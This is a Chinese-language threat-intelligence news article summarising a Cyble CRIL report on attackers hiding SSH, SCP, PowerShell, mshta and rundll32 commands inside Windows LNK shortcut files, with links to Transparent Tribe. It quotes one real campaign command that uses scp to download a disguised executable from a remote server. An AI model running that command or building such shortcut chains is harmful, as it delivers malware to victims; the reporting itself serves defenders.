Cyble 研究与情报实验室 (CRIL) 最近发布的一份报告揭示了一个令人不安的趋势:威胁行为者越来越多地利用 LNK 文件和 SSH 命令作为隐秘工具来策划高级网络攻击。这些技术使攻击者能够绕过传统的安全措施,保持持久性并执行多阶段攻击链,从而危害全球系统。
LNK 文件(通常称为 Windows 快捷方式文件)已成为威胁行为者的首选初始感染媒介。CRIL在报告中指出:“这些恶意快捷方式文件通常伪装成合法文档,已成为攻击者试图入侵系统的首选入口点。”通过嵌入利用 Living-off-the-Land Binaries (LOLBins) 的命令(例如 PowerShell 和 rundll32),攻击者可以在逃避检测的同时执行其他有效负载。
最近的攻击活动将 SSH 命令嵌入到恶意 LNK 文件中,使其变得更加复杂。这些命令有助于各种恶意活动,包括数据泄露、远程负载执行和持久性。CRIL 观察到攻击者使用安全复制协议 (SCP) 下载和执行恶意文件。其中一个攻击活动使用了如下配置的 SSH 命令:
scp [email protected]:/home/revenge/christmas-sale.exe c:userspublic该命令下载了伪装成合法应用程序的恶意可执行文件以推进攻击。
该报告强调了 SSH 命令被滥用的多种方式:
LNK 文件的内容 | 来源:CRIL
-
用于文件下载的 SCP:攻击者使用 SCP 从远程服务器检索并执行恶意文件。
-
通过 ProxyCommand 执行 PowerShell:SSH 命令调用 PowerShell 执行恶意脚本,例如通过 mshta.exe 访问远程 URL 以下载有害负载。
-
Rundll32 和 CMD 利用:SSH 命令触发 rundll32 加载恶意 DLL,并附带诱饵文档以分散受害者的注意力。
高级持续性威胁 (APT) 组织已采用这些技术,并将其整合到他们的剧本中,以针对高价值行业。CRIL 发现最近的活动与 APT 组织 Transparent Tribe 之前的攻击有相似之处,该组织以针对国防和航空航天行业而闻名。
LNK 文件和 SSH 命令的使用代表了网络攻击方法的范式转变。“这些技术在不断发展,威胁行为者通过利用受信任的系统实用程序来改进其逃避检测的方法,”CRIL 强调道。
原文始发于微信公众号(独眼情报):LNK 文件和 SSH 命令:高级网络攻击的新武器库
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论